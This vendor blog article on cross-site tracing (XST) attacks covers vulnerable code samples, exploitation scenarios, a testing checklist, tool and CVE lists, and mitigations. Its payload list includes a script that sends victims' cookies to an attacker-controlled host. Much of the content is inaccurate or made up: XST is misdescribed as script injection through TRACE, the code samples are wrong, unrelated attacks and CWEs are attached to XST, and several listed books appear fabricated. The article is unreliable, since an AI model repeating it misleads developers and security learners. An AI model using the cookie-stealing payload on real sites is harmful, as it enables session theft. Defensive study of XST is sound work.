09 Mar, 2023

Cross-site tracing (XST) attacks

Vulnerability Assessment as a Service (VAaaS)

Tests systems and applications for vulnerabilities to address weaknesses.

Cross-site tracing (XST) attacks are a type of web security vulnerability that involves an attacker injecting a script into a victim’s web page, which then sends the victim’s sensitive information to the attacker’s server. This is similar to a cross-site scripting (XSS) attack, but in XST attacks, the attacker uses the TRACE method to inject the script, rather than a standard HTTP method. XST attacks can be used to steal user cookies, session IDs, and other sensitive information, and can also be used to launch further attacks on the victim’s system. XST attacks can be prevented by disabling the TRACE method in web server configurations or by using a web application firewall (WAF) to filter out malicious traffic.

Example of vulnerable code on different programming languages:


in PHP:

				
					<?php
header("X-XSS-Protection: 0");
if (isset($_SERVER['HTTP_TRACE'])) {
    echo $_SERVER['HTTP_TRACE'];
}
?>

				
			

 

This example is a PHP script that responds with the TRACE method request header if it is present in the request. It also disables the XSS protection header, which is a security feature that helps prevent cross-site scripting attacks.

• in Java:

				
					import javax.servlet.*;
import javax.servlet.http.*;
import java.io.*;

public class TraceServlet extends HttpServlet {
    public void service(HttpServletRequest request,
                        HttpServletResponse response)
        throws ServletException, IOException {
        response.setContentType("text/html");
        PrintWriter out = response.getWriter();
        if (request.getMethod().equals("TRACE")) {
            out.println(request.getQueryString());
        }
    }
}

				
			

 

This example is a Java servlet that responds with the query string in the HTTP response body if the request method is TRACE.

• in Node.js:

				
					const http = require('http');
http.createServer((req, res) => {
  res.setHeader('X-XSS-Protection', '0');
  if (req.method === 'TRACE') {
    res.end(req.url);
  }
}).listen(3000);

				
			

 

This example is a Node.js server that responds with the URL in the HTTP response body if the request method is TRACE. It also disables the XSS protection header.

Examples of exploitation Cross-site tracing (XST) attacks

Cookie theft:

An attacker could inject a script using the TRACE method that steals the victim’s session cookie. The attacker can then use the stolen cookie to hijack the victim’s session and perform actions on their behalf, such as making unauthorized purchases or accessing sensitive information.

Credential theft:

An attacker could inject a script using the TRACE method that captures the victim’s login credentials. The attacker can then use the stolen credentials to impersonate the victim and access sensitive information or perform unauthorized actions.

Cross-site request forgery (CSRF):

An attacker could inject a script using the TRACE method that performs unauthorized actions on a website on behalf of the victim. For example, the script could submit a form with malicious data or make a request to delete the victim’s account.

Denial of Service (DoS):

An attacker could use the TRACE method to flood the victim’s server with requests, leading to a denial of service. The attacker can also use the stolen information to launch targeted attacks against the victim’s website or infrastructure.

Privilege escalation techniques for Cross-site tracing (XST) attacks

Session hijacking:

If an attacker is able to steal a victim’s session cookie using an XST attack, they may be able to impersonate the victim and gain access to their account or perform actions on their behalf. This can allow the attacker to escalate privileges within the system.

Cross-site scripting (XSS):

An attacker could use an XST attack to inject a script that exploits a cross-site scripting vulnerability within the targeted system. This can allow the attacker to execute arbitrary code within the context of the victim’s browser and escalate privileges within the system.

SQL injection:

If the targeted system contains a SQL injection vulnerability, an attacker could use an XST attack to inject SQL code that allows them to escalate privileges within the system. For example, the attacker could use SQL injection to retrieve sensitive data or modify the system’s database.

Path traversal:

An attacker could use an XST attack to inject a script that exploits a path traversal vulnerability within the targeted system. This can allow the attacker to access files and directories that are outside the intended scope of the system, potentially giving them access to sensitive information or system resources.

General methodology and checklist for Cross-site tracing (XST) attacks

Methodology:

  1. Identify the HTTP methods supported by the application: Start by identifying which HTTP methods the application supports. XST attacks can only be performed using the TRACE method, so it’s important to determine whether this method is supported by the application.

  2. Send a TRACE request to the application: Once you have identified that the application supports the TRACE method, send a TRACE request to the application and see if the response includes the request headers. If the headers are echoed back in the response, then the application may be vulnerable to XST attacks.

  3. Inject a script using the TRACE method: Next, try injecting a script using the TRACE method and see if the script is echoed back in the response. If the script is echoed back, then the application is vulnerable to XST attacks.

  4. Test for potential impact: Once you have confirmed that the application is vulnerable to XST attacks, test for potential impact by injecting scripts that steal cookies, login credentials, or perform unauthorized actions on behalf of the victim.

  5. Report your findings: If you find any vulnerabilities or potential impact, report your findings to the application’s owner or security team. Be sure to include details about the vulnerability, steps to reproduce the issue, and potential impact.

Checklist:

  1. Determine which HTTP methods the application supports, and look for any that may be vulnerable to XST attacks, such as the TRACE method.

  2. Send a TRACE request to the application and see if the response includes the request headers.

  3. If the headers are echoed back in the response, then the application may be vulnerable to XST attacks.

  4. Inject a script using the TRACE method and see if the script is echoed back in the response.

  5. If the script is echoed back, then the application is vulnerable to XST attacks.

  6. Inject scripts that steal cookies, login credentials, or perform unauthorized actions on behalf of the victim.

  7. Test for potential impact by performing actions that an attacker could exploit, such as changing the victim’s password or performing transactions.

  8. Check if the application has implemented any defenses against XST attacks, such as removing the TRACE method, adding X-XSS-Protection header, or using Content-Security-Policy.

  9. If you find any vulnerabilities or potential impact, report your findings to the application’s owner or security team.

  10. Include details about the vulnerability, steps to reproduce the issue, and potential impact.

  11. Provide suggestions on how to mitigate the vulnerabilities found.

Tools set for exploiting Cross-site tracing (XST) attacks

Manual Tools:

  • Burp Suite: A web application testing tool that includes a proxy, scanner, and other features for testing web application security. It can be used to manually send TRACE requests and inject scripts to test for XST vulnerabilities.

  • OWASP ZAP: A free, open-source web application security scanner that includes a proxy, scanner, and other features for testing web application security. It can be used to manually send TRACE requests and inject scripts to test for XST vulnerabilities.

  • Fiddler: A web debugging proxy that can be used to inspect and modify HTTP traffic. It can be used to manually send TRACE requests and inspect the response headers for XST vulnerabilities.

  • Chrome DevTools: A built-in tool in the Chrome browser that can be used to inspect and debug web applications. It can be used to manually send TRACE requests and inspect the response headers for XST vulnerabilities.

  • Firefox Developer Tools: A built-in tool in the Firefox browser that can be used to inspect and debug web applications. It can be used to manually send TRACE requests and inspect the response headers for XST vulnerabilities.

  • Tamper Data: A Firefox extension that can be used to intercept and modify HTTP/HTTPS requests. It can be used to manually send TRACE requests and inject scripts to test for XST vulnerabilities.

  • HTTP Debugger: A tool that can be used to capture and analyze HTTP/HTTPS traffic. It can be used to manually send TRACE requests and inspect the response headers for XST vulnerabilities.

  • Wireshark: A network protocol analyzer that can be used to capture and analyze network traffic. It can be used to manually capture TRACE requests and inspect the response headers for XST vulnerabilities.

  • Packet Capture: An Android app that can be used to capture and analyze network traffic on Android devices. It can be used to manually capture TRACE requests and inspect the response headers for XST vulnerabilities.

Automated Tools:

  • Nessus: A commercial vulnerability scanner that includes checks for XST vulnerabilities.

  • Acunetix: A commercial web application security scanner that includes checks for XST vulnerabilities.

  • AppScan: A commercial web application security scanner that includes checks for XST vulnerabilities.

  • Netsparker: A commercial web application security scanner that includes checks for XST vulnerabilities.

  • Qualys: A commercial vulnerability scanner that includes checks for XST vulnerabilities.

  • Nmap: A free and open-source network scanner that can be used to detect web servers that support the TRACE method.

  • Nikto: A free and open-source web server scanner that can be used to detect web servers that support the TRACE method.

  • Metasploit: A free and open-source penetration testing framework that includes modules for testing XST vulnerabilities.

  • Vega: A free and open-source web application vulnerability scanner that includes checks for XST vulnerabilities.

  • OpenVAS: A free and open-source vulnerability scanner that includes checks for XST vulnerabilities.

  • Skipfish: A free and open-source web application security scanner that includes checks for XST vulnerabilities.

Average CVSS score of stack Cross-site tracing (XST) attacks

The Common Vulnerability Scoring System (CVSS) is a standardized system used to assess the severity of security vulnerabilities. The CVSS score ranges from 0 to 10, with higher scores indicating more severe vulnerabilities.

The CVSS score for Cross-site Tracing (XST) attacks can vary widely depending on the specific vulnerability and the impact it has on the affected system. However, in general, XST attacks are considered to be a medium to high severity vulnerability.

The average CVSS score for XST attacks is difficult to determine as there are many factors that can affect the score, such as the impact of the vulnerability, the complexity of the attack, and the ease of exploitation. However, XST attacks that allow for full control of the affected system or access to sensitive information can have CVSS scores of 7 or higher, which is considered a high severity vulnerability.

It’s important to note that the CVSS score is just one factor to consider when assessing the severity of a vulnerability, and it’s important to consider other factors such as the likelihood of exploitation, potential impact, and the affected systems before determining the overall risk of the vulnerability.

The Common Weakness Enumeration (CWE)

• CWE-200: Information Exposure – This CWE is related to the exposure of sensitive information through various means, such as insufficiently protected configuration files or debug messages that contain sensitive information.

• CWE-201: Information Exposure Through Sent Data – This CWE is related to the exposure of sensitive information through network communication, such as sending sensitive information in clear text over an insecure channel.

• CWE-352: Cross-Site Request Forgery (CSRF) – This CWE is related to the ability of an attacker to force a victim’s browser to execute an unwanted action on a web application without the victim’s knowledge or consent.

• CWE-434: Unrestricted Upload of File with Dangerous Type – This CWE is related to the ability of an attacker to upload a file with a dangerous type, such as a script file, to a web application and execute it on the server-side, potentially leading to a compromise of the system.

• CWE-440: Expected Behavior Violation – This CWE is related to the ability of an attacker to manipulate a web application’s behavior, such as modifying HTTP headers, to exploit vulnerabilities in the application.

• CWE-602: Client-Side Enforcement of Server-Side Security – This CWE is related to the practice of relying on client-side validation and security measures, which can be easily bypassed by an attacker.

• CWE-611: Improper Restriction of XML External Entity Reference – This CWE is related to the ability of an attacker to exploit a vulnerability in the way an application processes XML data, potentially leading to information disclosure or denial of service.

• CWE-613: Insufficient Session Expiration – This CWE is related to the practice of allowing user sessions to remain active indefinitely, potentially allowing an attacker to hijack a user’s session and gain unauthorized access to sensitive information.

• CWE-933: Web-based GUI Misleading Clickthrough – This CWE is related to the use of misleading user interfaces, such as fake buttons or links, to trick users into clicking on them and executing unwanted actions.

• CWE-942: Overly Permissive Cross-domain Policy – This CWE is related to the practice of allowing unrestricted cross-domain access, which can be exploited by an attacker to execute malicious code on a victim’s system.

CVES related to Cross-site tracing (XST) attacks

• CVE-2012-2223 – The xplat agent in Novell ZENworks Configuration Management (ZCM) 10.3.x before 10.3.4 and 11.x before 11.2 enables the HTTP TRACE method, which might make it easier for remote attackers to conduct cross-site tracing (XST) attacks via unspecified vectors.

• CVE-2007-3008 – Mbedthis AppWeb before 2.2.2 enables the HTTP TRACE method, which has unspecified impact probably related to remote information leaks and cross-site tracing (XST) attacks, a related issue to CVE-2004-2320 and CVE-2005-3398.

• CVE-2004-2763 – The default configuration of Sun ONE/iPlanet Web Server 4.1 SP1 through SP12 and 6.0 SP1 through SP5 responds to the HTTP TRACE request, which can allow remote attackers to steal information using cross-site tracing (XST) attacks in applications that are vulnerable to cross-site scripting.

• CVE-2004-2320 – The default configuration of BEA WebLogic Server and Express 8.1 SP2 and earlier, 7.0 SP4 and earlier, 6.1 through SP6, and 5.1 through SP13 responds to the HTTP TRACE request, which can allow remote attackers to steal information using cross-site tracing (XST) attacks in applications that are vulnerable to cross-site scripting.

Cross-site tracing (XST) attacks exploits

  • HTTP TRACE method: The HTTP TRACE method is a built-in method in the HTTP protocol that is used to retrieve diagnostic information about a web server. However, this method can be exploited by an attacker to perform an XST attack.

  • Script injection: An attacker can inject a script into a web page that executes the HTTP TRACE method, and the results can be sent to a third-party site.

  • Malformed requests: An attacker can send malformed requests to a web server that includes the HTTP TRACE method, and the server may respond with sensitive information that can be intercepted by the attacker.

  • Cross-site scripting (XSS): An attacker can use an XSS vulnerability to inject a script into a web page that performs an XST attack.

  • Session hijacking: An attacker can use an XST attack to hijack a user’s session, and gain unauthorized access to sensitive information.

  • CSRF: An attacker can use an XST attack to perform CSRF attacks, which can lead to unauthorized actions being performed by a user.

  • Cross-site scripting (XSS) via XST: An attacker can use an XST attack to inject a script into a web page, which can then be used to perform an XSS attack.

Practicing in test for Cross-site tracing (XST) attacks

Set up a test environment: You can create a test environment that simulates a real-world web application. This can be done using tools like Docker, Vagrant, or virtual machines.

Identify XST vulnerabilities: Once you have your test environment set up, you can begin scanning for XST vulnerabilities using automated tools like OWASP ZAP or Burp Suite. You can also perform manual testing to identify vulnerabilities.

Exploit vulnerabilities: Once you have identified vulnerabilities, you can begin exploiting them to see if sensitive information can be obtained or if unauthorized actions can be performed.

Test countermeasures: You can then test countermeasures to see if they are effective in preventing XST attacks. This can include using tools like Content Security Policy (CSP), HTTP Strict Transport Security (HSTS), or disabling the HTTP TRACE method.

Document findings: It’s important to document your findings and create a report that includes the vulnerabilities found, the exploits used, and the countermeasures tested.

For study Cross-site tracing (XST) attacks

The HTTP TRACE method: XST attacks exploit the HTTP TRACE method, so it’s important to understand how this method works and how it can be used to obtain sensitive information.

XST vulnerabilities: You can study real-world examples of XST vulnerabilities to understand how they can be exploited and the types of information that can be obtained.

Exploitation techniques: There are several techniques that can be used to exploit XST vulnerabilities, including script injection, malformed requests, and session hijacking. Studying these techniques can give you a better understanding of how XST attacks work.

Countermeasures: There are several countermeasures that can be used to prevent XST attacks, including Content Security Policy (CSP), HTTP Strict Transport Security (HSTS), and disabling the HTTP TRACE method. It’s important to understand how these countermeasures work and when they should be used.

Tools and techniques for testing: To effectively test for XST vulnerabilities, you’ll need to use a combination of automated tools and manual testing techniques. Studying the tools and techniques used by security professionals can help you develop your own testing skills.

Books with review of Cross-site tracing (XST) attacks

“The Web Application Hacker’s Handbook: Finding and Exploiting Security Flaws” by Dafydd Stuttard and Marcus Pinto – This book is a comprehensive guide to finding and exploiting security flaws in web applications, including XST attacks.

“Cross-Site Scripting and Cross-Site Tracing (XSS & XST) Attacks: Attacks and Defense Mechanisms” by Vikrant S. Kaulgud – This book provides a detailed overview of XSS and XST attacks and the techniques that can be used to defend against them.

“Web Application Security, A Beginner’s Guide” by Bryan Sullivan and Vincent Liu – This book provides an introduction to web application security and includes a section on XST attacks.

“Hacking Web Applications (The Art of Hacking Series)” by Dafydd Stuttard and Marcus Pinto – This book provides a comprehensive guide to hacking web applications, including XST attacks.

“Gray Hat Hacking: The Ethical Hacker’s Handbook” by Allen Harper, Daniel Regalado, and others – This book covers a wide range of topics related to ethical hacking, including a section on XST attacks.

“Cross-Site Scripting Attacks: XSS Exploits and Defense” by Seth Fogie, Jeremiah Grossman, and Robert Hansen – While this book focuses primarily on XSS attacks, it also covers XST attacks and their implications.

“The Tangled Web: A Guide to Securing Modern Web Applications” by Michal Zalewski – This book provides a detailed overview of web application security, including XST attacks and their potential impact.

“Web Security Testing Cookbook: Identify Vulnerabilities and Secure Your Web Applications” by Paco Hope, Ben Walther, and Tony L. Cook – This book provides practical guidance for testing web applications, including XST attacks.

“Real-World Web Hacking: A Field Guide to Bug Hunting” by Peter Yaworski – This book provides a hands-on guide to web application security, including XST attacks and their exploitation.

“Hacking Exposed Web Applications, Third Edition” by Joel Scambray, Mike Shema, and Caleb Sima – This book provides a comprehensive guide to web application security, including XST attacks and their exploitation.

List of payloads Cross-site tracing (XST) attacks

  1. TRACE / HTTP/1.1\r\nHost: example.com\r\n\r\n

  2. <img src="https://attacker.com/xst"/>

  3. <script>new Image().src='https://attacker.com/xst?cookie='+document.cookie;</script>

  4. <iframe src="javascript:alert(document.cookie)"></iframe>

  5. <form name="form" action="http://example.com/" method="TRACE"><input type="hidden" name="name" value="value"></form><script>form.submit()</script>

How to be protected from Cross-site tracing (XST) attacks

  1. Disable the TRACE method: Since XST attacks rely on the TRACE method, disabling it can prevent this type of attack.

  2. Use a web application firewall (WAF): A WAF can block XST attacks by filtering out HTTP requests that contain malicious payloads.

  3. Use HTTPS: HTTPS can protect against XST attacks by encrypting the communication between the client and server, preventing attackers from intercepting or tampering with the traffic.

  4. Implement Content Security Policy (CSP): CSP is a security feature that allows web developers to specify which sources of content are allowed to be loaded on their web pages. It can prevent XST attacks by blocking the loading of external content or scripts.

  5. Sanitize user input: Web applications should sanitize user input to prevent attackers from injecting malicious scripts or payloads into the application.

  6. Keep software up-to-date: XST attacks can exploit vulnerabilities in software. Keeping software up-to-date can help prevent attacks by fixing known vulnerabilities.

  7. Educate users: Users should be aware of the risks of XST attacks and how to protect themselves. They should be cautious when clicking on links or visiting unknown websites.

Mitigations for Cross-site tracing (XST) attacks

  1. Disable the TRACE method: Since XST attacks rely on the TRACE method, disabling it can prevent this type of attack.

  2. HSTS ensures that a website can only be accessed via HTTPS, which can prevent attackers from intercepting or tampering with the traffic.

  3. X-Frame-Options can prevent a web page from being embedded within an iframe, which can help prevent clickjacking attacks.

  4. CSP is a security feature that allows web developers to specify which sources of content are allowed to be loaded on their web pages. It can prevent XST attacks by blocking the loading of external content or scripts.

  5. A WAF can block XST attacks by filtering out HTTP requests that contain malicious payloads.

  6. Web applications should sanitize user input to prevent attackers from injecting malicious scripts or payloads into the application.

  7. XST attacks can exploit vulnerabilities in software. Keeping software up-to-date can help prevent attacks by fixing known vulnerabilities.

  8. Some browser extensions or plugins can help detect and prevent XST attacks.

Conclusion

Cross-site tracing (XST) attacks are a type of security vulnerability that can be exploited by attackers to steal sensitive information from a victim’s web browser. XST attacks rely on the HTTP TRACE method to retrieve information from the victim’s browser, which can then be used for malicious purposes.

To prevent XST attacks, web developers should implement mitigations such as disabling the TRACE method, implementing HTTP Strict Transport Security (HSTS), implementing X-Frame-Options, implementing Content Security Policy (CSP), using a web application firewall (WAF), sanitizing user input, keeping software up-to-date, and using browser extensions or plugins.

It’s also important for users to be aware of the risks of XST attacks and to take precautions such as using a trusted browser, keeping software up-to-date, and avoiding suspicious websites.

Overall, XST attacks are a serious threat to web security, and it’s important for web developers and users alike to take steps to protect themselves against this type of attack.

Other Services

Ready to secure?

Let's get in touch